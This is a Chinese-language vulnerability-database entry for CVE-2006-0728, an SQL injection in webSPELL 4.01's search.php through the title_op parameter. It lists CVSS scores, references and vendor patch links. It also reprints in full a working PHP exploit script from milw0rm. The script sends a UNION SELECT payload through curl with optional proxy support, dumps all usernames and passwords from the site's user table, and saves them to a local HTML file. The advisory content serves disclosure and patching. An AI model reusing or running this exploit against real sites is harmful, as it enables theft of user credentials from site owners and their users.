CVE-2006-0728 |
|
发布时间 :2006-02-16 06:02:00 | ||
修订时间 :2017-07-19 21:30:01 | ||||
NMCOE |
[原文]SQL injection vulnerability in search.php in webSPELL 4.01.00 and earlier allows remote attackers to inject arbitrary SQL commands via the title_op parameter.
[CNNVD]WebSPELL Search.PHP SQL注入漏洞(CNNVD-200602-247)
webSPELL 4.01.00及之前版本的search.php中存在SQL注入漏洞。远程攻击者可以借助title_op参数注入任意SQL命令。
- CVSS (基础分值)
CVSS分值: | 7.5 | [严重(HIGH)] |
机密性影响: | [--] | |
完整性影响: | [--] | |
可用性影响: | [--] | |
攻击复杂度: | [--] | |
攻击向量: | [--] | |
身份认证: | [--] |
- CPE (受影响的平台与产品)
产品及版本信息(CPE)暂不可用 |
- OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
- 官方数据库链接
- 其它链接及资源
http://www.securityfocus.com/bid/16673 (UNKNOWN) BID 16673 |
http://www.vupen.com/english/advisories/2006/0606 (UNKNOWN) VUPEN ADV-2006-0606 |
http://www.webspell.org/index.php?site=news_comments&newsID=49&lang=en (PATCH) CONFIRM http://www.webspell.org/index.php?site=news_comments&newsID=49&lang=en |
https://exchange.xforce.ibmcloud.com/vulnerabilities/24708 (UNKNOWN) XF webspell-search-sql-injection(24708) |
- 漏洞信息
WebSPELL Search.PHP SQL注入漏洞 | |
高危 | SQL注入 |
2006-02-16 00:00:00 | 2006-02-17 00:00:00 |
远程 | |
webSPELL 4.01.00及之前版本的search.php中存在SQL注入漏洞。远程攻击者可以借助title_op参数注入任意SQL命令。 |
- 公告与补丁
目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
webSPELL webSPELL 4.0 webSPELL SecurityFix 2006-02-15 http://www.webspell.org/index.php?site=files&file=4 webSPELL webSPELL 4.1 webSPELL SecurityFix 2006-02-15 http://www.webspell.org/index.php?site=files&file=4 |
- 漏洞信息 (1498)
webSPELL <= 4.01 (title_op) Remote SQL Injection Exploit (EDBID:1498) | |
php | webapps |
2006-02-14 | Verified |
0 | x128 |
N/A | [点击下载] |
<? error_reporting(E_ERROR); function xss_init() { if (!extension_loaded('php_curl')) { if (!dl('curl.so') and !dl('php_curl.so') and !dl('php_curl.dll')) die ("oo error - cannot load curl extension!"); } } function xss_header() { echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; echo " oo ooooooo ooooooo\n"; echo " oooo oooo o888 o88 888 o888 888o\n"; echo " 888o888 888 o888 888888888\n"; echo " o88888o 888 o888 o 888o o888\n"; echo " o88o o88o o888o o8888oooo88 88ooo88\n"; echo "oooooooooooooooooooooooooooo webspell 4.01 exploit ooooooooooooooooooooooooooooo\n"; echo "oo usage $ php webspell-401-exploit.php [url] [prefix]\n"; echo "oo proxy support $ php webspell-401-exploit.php [url] [prefix] [proxy]:[port]\n"; echo "oo example $ php webspell-401-exploit.php http://localhost webs_\n"; echo "oo open the file webspell_pw.html - there you find the passwords of all users\n\n"; } function xss_bottom() { echo "\noo discover : x128 - alexander wilhelm - 13/02/2006\n"; echo "oo contact : exploit <at> x128.net oo website : www.x128.net"; } function xss_exploit() { $xss_target = $_SERVER['argv'][1] . "/index.php"; $xss_http_get = "?site=search&action=search"; $xss_http_post = "table=news&title1=9a39b0c5e6849658e30d1432a308103d&title_op=UNION SELECT 1, 1, 1, 1, username, `password`, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM ". $_SERVER['argv'][2] ."user/*"; $xss_connection = curl_init(); if ($_SERVER['argv'][3]) { curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8); curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][3]); } curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get); curl_setopt ($xss_connection, CURLOPT_HEADER, 0); curl_setopt ($xss_connection, CURLOPT_POST, 1); curl_setopt ($xss_connection, CURLOPT_POSTFIELDS, $xss_http_post); curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128'); $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!"); if ($xss_source) echo "oo dafaced ...\n"; $xss_output = fopen("webspell_pw.html","w"); fputs($xss_output, $xss_source); fclose($xss_output); curl_close ($xss_connection); } xss_init(); xss_header(); xss_exploit(); xss_bottom(); ?> # milw0rm.com [2006-02-14]
- 漏洞信息
23225 | |
webSPELL search.php SQL Injection | |
Remote / Network Access | Information Disclosure, Input Manipulation |
Loss of Confidentiality, Loss of Integrity | |
Exploit Public | Vendor Verified |
- 漏洞描述
Unknown or Incomplete |
- 时间线
2006-02-15 | Unknow |
Unknow | Unknow |
- 解决方案
Unknown or Incomplete |
- 相关参考
|
漏洞作者
Unknown or Incomplete |